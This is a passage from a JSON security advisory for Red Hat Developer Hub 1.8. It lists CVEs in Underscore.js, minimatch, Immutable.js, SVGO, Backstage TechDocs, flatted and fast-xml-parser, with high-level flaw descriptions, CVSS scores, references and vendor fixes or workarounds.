1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:9742"}, {"category": "workaround", "details": "To mitigate this issue, applications utilizing Underscore.js should ensure that any processing of untrusted, recursively structured data with `_.flatten` or `_.isEqual` explicitly enforces a finite depth limit. Review application code to identify and modify calls to these functions, adding appropriate depth parameters to prevent stack overflow conditions. Additionally, input validation should be implemented to sanitize untrusted data before it is processed by Underscore.js functions.", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "threats": [{"category": "impact", "details": "Moderate"}], "title": "Underscore.js: Underscore.js: Denial of Service via recursive data structures in flatten and isEqual functions"}, {"cve": "CVE-2026-27904", "cwe": {"id": "CWE-1333", "name": "Inefficient Regular Expression Complexity"}, "discovery_date": "2026-02-26T02:01:23.004531+00:00", "flags": [{"label": "vulnerable_code_not_present", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2442922"}], "notes": [{"category": "description", "text": "A flaw was found in minimatch. A remote attacker could exploit this vulnerability by providing a specially crafted glob expression with nested unbounded quantifiers. This could lead to catastrophic backtracking in the V8 JavaScript engine, causing the application to become unresponsive and resulting in a Denial of Service (DoS).", "title": "Vulnerability description"}, {"category": "summary", "text": "minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions", "title": "Vulnerability summary"}, {"category": "other", "text": "Exploitation of this flaw requires that a user or service processes untrusted input.", "title": "Statement"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "known_not_affected": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2026-27904"}, {"category": "external", "summary": "RHBZ#2442922", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442922"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2026-27904", "url": "https://www.cve.org/CVERecord?id=CVE-2026-27904"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27904", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27904"}, {"category": "external", "summary": "https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74", "url": "https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74"}], "release_date": "2026-02-26T01:07:42.693000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-22T14:56:38+00:00", "details": "For more about Red Hat Developer Hub, see References links", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:9742"}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "threats": [{"category": "impact", "details": "Moderate"}], "title": "minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions"}, {"cve": "CVE-2026-29063", "cwe": {"id": "CWE-915", "name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"}, "discovery_date": "2026-03-06T19:00:57.982727+00:00", "flags": [{"label": "vulnerable_code_not_present", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2445291"}], "notes": [{"category": "description", "text": "A flaw was found in Immutable.js, a library for persistent immutable data structures. This vulnerability, known as Prototype Pollution, allows an attacker with low privileges to inject unwanted properties into core JavaScript object prototypes without user interaction. By manipulating specific APIs such as mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject(), a remote attacker could potentially execute arbitrary code or cause a denial of service (DoS).", "title": "Vulnerability description"}, {"category": "summary", "text": "immutable-js: Immutable.js: Arbitrary code execution via Prototype Pollution", "title": "Vulnerability summary"}, {"category": "other", "text": "Exploitation of this vulnerability requires that an attacker is able to provide arbitrary data to clients of this library in a way that calls the affected functions with data the attacker controls. In most deployments, the ability to provide data in this fashion requires that an attacker has some degree of privileges to access the affected applications.", "title": "Statement"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "known_not_affected": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2026-29063"}, {"category": "external", "summary": "RHBZ#2445291", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445291"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2026-29063", "url": "https://www.cve.org/CVERecord?id=CVE-2026-29063"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-29063", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29063"}, {"category": "external", "summary": "https://github.com/immutable-js/immutable-js/releases/tag/v3.8.3", "url": "https://github.com/immutable-js/immutable-js/releases/tag/v3.8.3"}, {"category": "external", "summary": "https://github.com/immutable-js/immutable-js/releases/tag/v4.3.8", "url": "https://github.com/immutable-js/immutable-js/releases/tag/v4.3.8"}, {"category": "external", "summary": "https://github.com/immutable-js/immutable-js/releases/tag/v5.1.5", "url": "https://github.com/immutable-js/immutable-js/releases/tag/v5.1.5"}, {"category": "external", "summary": "https://github.com/immutable-js/immutable-js/security/advisories/GHSA-wf6x-7x77-mvgw", "url": "https://github.com/immutable-js/immutable-js/security/advisories/GHSA-wf6x-7x77-mvgw"}], "release_date": "2026-03-06T18:25:22.438000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-22T14:56:38+00:00", "details": "For more about Red Hat Developer Hub, see References links", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:9742"}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "products": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "threats": [{"category": "impact", "details": "Important"}], "title": "immutable-js: Immutable.js: Arbitrary code execution via Prototype Pollution"}, {"cve": "CVE-2026-29074", "cwe": {"id": "CWE-776", "name": "Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')"}, "discovery_date": "2026-03-06T00:00:00+00:00", "flags": [{"label": "vulnerable_code_not_present", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2445132"}], "notes": [{"category": "description", "text": "A flaw was found in SVGO, an SVG (Scalable Vector Graphics) Optimizer. This vulnerability allows a remote attacker to cause a Denial of Service (DoS) by submitting a specially crafted XML file. The application's failure to properly guard against XML entity expansion or recursion can lead to the Node.js process consuming excessive memory and crashing.", "title": "Vulnerability description"}, {"category": "summary", "text": "svgo: SVGO: Denial of Service via XML entity expansion", "title": "Vulnerability summary"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "known_not_affected": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2026-29074"}, {"category": "external", "summary": "RHBZ#2445132", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445132"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2026-29074", "url": "https://www.cve.org/CVERecord?id=CVE-2026-29074"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-29074", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29074"}, {"category": "external", "summary": "https://github.com/svg/svgo/security/advisories/GHSA-xpqw-6gx7-v673", "url": "https://github.com/svg/svgo/security/advisories/GHSA-xpqw-6gx7-v673"}], "release_date": "2026-03-06T07:23:05.716000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-22T14:56:38+00:00", "details": "For more about Red Hat Developer Hub, see References links", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:9742"}, {"category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "threats": [{"category": "impact", "details": "Important"}], "title": "svgo: SVGO: Denial of Service via XML entity expansion"}, {"cve": "CVE-2026-29186", "cwe": {"id": "CWE-791", "name": "Incomplete Filtering of Special Elements"}, "discovery_date": "2026-03-07T16:01:40.949207+00:00", "flags": [{"label": "vulnerable_code_not_present", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2445480"}], "notes": [{"category": "description", "text": "A flaw was found in Backstage. The backstage/plugin-techdocs-node package uses an allowlist to filter dangerous MkDocs configuration keys during the documentation build process. A gap in this allowlist allows attackers to craft an mkdocs.yml file that causes arbitrary Python code execution.", "title": "Vulnerability description"}, {"category": "summary", "text": "backstage/plugin-techdocs-node: TechDocs Mkdocs configuration key enables arbitrary code execution", "title": "Vulnerability summary"}, {"category": "other", "text": "To exploit this issue, an attacker needs commit access to a repository that Backstage is configured to track and build in order to introduce a malicious mkdocs.yml file into the TechDocs build pipeline. Additionally, an attacker can execute arbitrary Python code but the payload is confined by the permissions granted to the TechDocs build process which is typically a restricted service account, limiting the impact of this vulnerability. Due to these reasons, this vulnerability has been rated with an important severity.", "title": "Statement"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "known_not_affected": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2026-29186"}, {"category": "external", "summary": "RHBZ#2445480", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445480"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2026-29186", "url": "https://www.cve.org/CVERecord?id=CVE-2026-29186"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-29186", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29186"}, {"category": "external", "summary": "https://github.com/backstage/backstage/security/advisories/GHSA-928r-fm4v-mvrw", "url": "https://github.com/backstage/backstage/security/advisories/GHSA-928r-fm4v-mvrw"}], "release_date": "2026-03-07T15:03:51.422000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-22T14:56:38+00:00", "details": "For more about Red Hat Developer Hub, see References links", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:9742"}, {"category": "workaround", "details": "To mitigate this issue, enable docker isolation by updating the Backstage configuration to use 'runIn: docker' instead of 'runIn: local', confining the arbitrary Python code execution to a containerized environment. Additionally, limit commit access to repositories tracked by Backstage to trusted contributors only, and enforce mandatory pull request (PR) reviews for any modifications made to the mkdocs.yml file.", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L", "version": "3.1"}, "products": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "threats": [{"category": "impact", "details": "Important"}], "title": "backstage/plugin-techdocs-node: TechDocs Mkdocs configuration key enables arbitrary code execution"}, {"cve": "CVE-2026-32141", "cwe": {"id": "CWE-770", "name": "Allocation of Resources Without Limits or Throttling"}, "discovery_date": "2026-03-12T19:01:30.987208+00:00", "flags": [{"label": "vulnerable_code_not_present", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2447083"}], "notes": [{"category": "description", "text": "A denial of service flaw has been discovered in the flatted npm library. flatted's parse() function uses a recursive revive() phase to resolve circular references in deserialized JSON. When given a crafted payload with deeply nested or self-referential $ indices, the recursion depth is unbounded, causing a stack overflow that crashes the Node.js process.", "title": "Vulnerability description"}, {"category": "summary", "text": "flatted: flatted: Unbounded recursion DoS in parse() revive phase", "title": "Vulnerability summary"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "known_not_affected": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2026-32141"}, {"category": "external", "summary": "RHBZ#2447083", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2447083"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2026-32141", "url": "https://www.cve.org/CVERecord?id=CVE-2026-32141"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-32141", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32141"}, {"category": "external", "summary": "https://github.com/WebReflection/flatted/commit/7eb65d857e1a40de11c47461cdbc8541449f0606", "url": "https://github.com/WebReflection/flatted/commit/7eb65d857e1a40de11c47461cdbc8541449f0606"}, {"category": "external", "summary": "https://github.com/WebReflection/flatted/pull/88", "url": "https://github.com/WebReflection/flatted/pull/88"}, {"category": "external", "summary": "https://github.com/WebReflection/flatted/security/advisories/GHSA-25h7-pfq9-p65f", "url": "https://github.com/WebReflection/flatted/security/advisories/GHSA-25h7-pfq9-p65f"}], "release_date": "2026-03-12T18:08:09.634000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-22T14:56:38+00:00", "details": "For more about Red Hat Developer Hub, see References links", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:9742"}, {"category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "threats": [{"category": "impact", "details": "Important"}], "title": "flatted: flatted: Unbounded recursion DoS in parse() revive phase"}, {"cve": "CVE-2026-33036", "cwe": {"id": "CWE-776", "name": "Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')"}, "discovery_date": "2026-03-20T06:02:18.306021+00:00", "flags": [{"label": "vulnerable_code_not_present", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2449458"}], "notes": [{"category": "description", "text": "A flaw was found in fast-xml-parser. A remote attacker can exploit this vulnerability by supplying specially crafted XML input containing numeric character references or standard XML entities. This input can bypass configured entity expansion limits, leading to excessive memory allocation and high CPU usage. The primary consequence is a Denial of Service (DoS), which can crash the affected process.", "title": "Vulnerability description"}, {"category": "summary", "text": "fast-xml-parser: fast-xml-parser: Denial of Service via XML entity expansion bypass", "title": "Vulnerability summary"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "known_not_affected": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2026-33036"}, {"category": "external", "summary": "RHBZ#2449458", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449458"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2026-33036", "url": "https://www.cve.org/CVERecord?id=CVE-2026-33036"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-33036", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33036"}, {"category": "external", "summary": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/bd26122c838e6a55e7d7ac49b4ccc01a49999a01", "url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/bd26122c838e6a55e7d7ac49b4ccc01a49999a01"}, {"category": "external", "summary": 